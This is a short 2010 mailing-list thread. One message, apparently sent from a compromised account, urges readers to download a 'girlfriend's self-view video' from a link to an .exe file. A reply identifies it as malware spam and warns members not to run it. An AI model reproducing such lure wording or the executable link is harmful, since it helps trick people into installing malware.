my girlfriend's self-view video

  • Charlie Griefer
    Message 1 of 2 , Nov 6, 2010
      Hi friends

      Please download and watch my girlfriend's self-view video
      http://www.zryh.info/video.exe

      After reading, please reply me......Very exciting.
    • jim collins
      Message 2 of 2 , Nov 6, 2010
        Pretty safe bet Charlie's been infected with some sort of malware. Obviously don't download or run the attachment.

        --
        Microsoft Certified System Engineer (MCSE)
        Adobe Certified ColdFusion Developer